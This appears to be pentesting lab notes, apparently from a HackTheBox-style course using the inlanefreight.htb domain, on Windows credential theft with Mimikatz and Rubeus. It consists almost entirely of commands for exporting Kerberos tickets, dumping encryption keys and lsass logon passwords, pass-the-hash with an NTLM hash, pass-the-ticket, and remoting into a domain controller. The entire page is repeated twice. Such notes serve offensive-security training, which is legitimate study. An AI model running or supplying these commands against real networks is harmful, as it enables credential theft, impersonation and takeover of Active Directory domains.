Mimikatz

mimikatz.exe

privilege::debug

sekurlsa::tickets /export

exit

The tickets that end with $ correspond to the computer account, which needs a ticket to interact with the Active Directory.
User tickets have the user's name,
- followed by an @ that separates the service name and the domain, for example: [randomvalue]-username@service-domain.local.kirbi.
We can also export tickets using Rubeus and the option dump
- This option can be used to dump all tickets (if running as a local administrator).
Rubeus dump, instead of giving us a file, will print the ticket encoded in base64 format. We are adding the option /nowrap for easier copy-paste.

mimikatz.exe
privilege::debug
sekurlsa::ekeys

mimikatz.exe
privilege::debug
sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

mimikatz.exe 
privilege::debug
kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"

mimikatz.exe

privilege::debug

kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"

exit

powershell

Enter-PSSession -ComputerName DC01

[DC01]: PS C:\Users\john\Documents> whoami

[DC01]: PS C:\Users\john\Documents> hostname

Note: It is always a good idea to type "log" before running any commands in "Mimikatz" this way all command output will put output to a ".txt" file.
- This is especially useful when dumping credentials from a server which may have many sets of credentials in memory.

mimikatz.exe

log

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords

Last updated 7 months ago

mimikatz.exe

privilege::debug

sekurlsa::tickets /export

exit

The tickets that end with $ correspond to the computer account, which needs a ticket to interact with the Active Directory.
User tickets have the user's name,
- followed by an @ that separates the service name and the domain, for example: [randomvalue]-username@service-domain.local.kirbi.
We can also export tickets using Rubeus and the option dump
- This option can be used to dump all tickets (if running as a local administrator).
Rubeus dump, instead of giving us a file, will print the ticket encoded in base64 format. We are adding the option /nowrap for easier copy-paste.

mimikatz.exe
privilege::debug
sekurlsa::ekeys

mimikatz.exe
privilege::debug
sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

mimikatz.exe 
privilege::debug
kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"

mimikatz.exe

privilege::debug

kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"

exit

powershell

Enter-PSSession -ComputerName DC01

[DC01]: PS C:\Users\john\Documents> whoami

[DC01]: PS C:\Users\john\Documents> hostname

Note: It is always a good idea to type "log" before running any commands in "Mimikatz" this way all command output will put output to a ".txt" file.
- This is especially useful when dumping credentials from a server which may have many sets of credentials in memory.

mimikatz.exe

log

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords

Last updated 7 months ago